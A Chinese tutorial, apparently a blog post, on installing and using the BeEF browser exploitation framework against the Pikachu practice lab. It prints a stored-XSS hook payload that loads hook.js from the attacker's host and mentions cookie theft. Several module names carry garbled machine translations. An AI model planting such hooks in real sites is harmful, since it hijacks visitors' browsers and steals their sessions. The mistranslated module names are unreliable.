Beef-Xss工具的简介

KaliLinux官网对这工具的介绍地址：https://www.kali.org/tools/beef-xss/
GitHub地址：https://github.com/beefproject/beef
Beef-Xss工具Wiki:https://github.com/beefproject/beef/wiki

BeEF 是浏览器开发框架的缩写，它是一款专注于网络浏览器的渗透测试工具
随着人们越来越担心针对客户端（包括移动客户端）的网络攻击，BeEF 允许专业的渗透测试人员通过使用客户端攻击向量来评估目标环境的实际安全状况，与其他安全框架不同，BeEF 超越了加固的网络边界和客户端系统，并在一扇敞开的门的上下文中检查可利用性：Web 浏览器
BeEF 将挂钩一个或多个 Web 浏览器，并将它们用作启动定向命令模块的滩头阵地，并从浏览器上下文中进一步攻击系统

安装Beef-Xss工具

这个工具最新的KaliLinux版本这个工具默认是不安装的，之前老版本的是自带的不管这么

apt-get install beef-xss

或

sudo apt-get install beef-xss

一路 y 就好，然后等待
如果出现下图，解决方法换地址源或者 apt update 重启之后在执行安装命令

启动Beef-Xss工具

beef-xss

第一次启动可能会提示这个，让你输入一个新的密码，输入回车即可（不会显示你输入的密码）下一次就不会让你输入了

它会自动打开浏览器 beef 控制台（账号默认：beef 密码（你第一次进入beef输入的））

关闭Beef-Xss

beef-xss-stop

Beef-Xss登录账户密码忘记解决方案：

安装之后在 /usr/share/beef-xss 目录下有一个 config.yaml 文件里面记录了密码账号：

用 vim 或者其它方式打开config.yaml 文件中 credentials: 下的 user是账号、passwd是密码，直接修改保存即可

启动Beef-Xss之后控制台会有一下信息

beef的xss代码格式：

<script src="http://<IP>:3000/hook.js"></script>

例子：比如我的KaliLinux的ip地址：192.168.56.129

<script src="http://192.168.56.129:3000/hook.js"></script>

beef控制台地址

http://127.0.0.1:3000/ui/panel
或者我的KaliLinux的ip地址：192.168.56.129 在宿主机浏览器输入：http://192.168.56.129:3000/ui/panel 都可以

Beef-Xss使用

我用pikachu靶场xss的存储型演示：

上面已经看到成功了，有时不一定怎么快展示等一会刷新一下

获取这些之后，具体可以实现上面功能在 commands 中查看

commands 模块中大概都是什么意思

我这里用就直接用谷歌翻译了

点击任意一个都有说明的比如播放声音模块

Browser（浏览器模块）

Chrome Extensions (Chrome 扩展)

Debug (调试)

Exploits（漏洞利用）

Host(主持人)

IPEC(国际环保提倡)

利用通信 (IPEC)进行的操作

Metasploit

Misc(杂项)

Network(网络)

Persistence(坚持)

Phonegap(电话间隙)

Social Engineering(社会工程)

简单的使用一个播放声音

是有一个 biu的一个声音

检测是否有 VLC

获取cookie

还有很多功能的这里就不一一演示了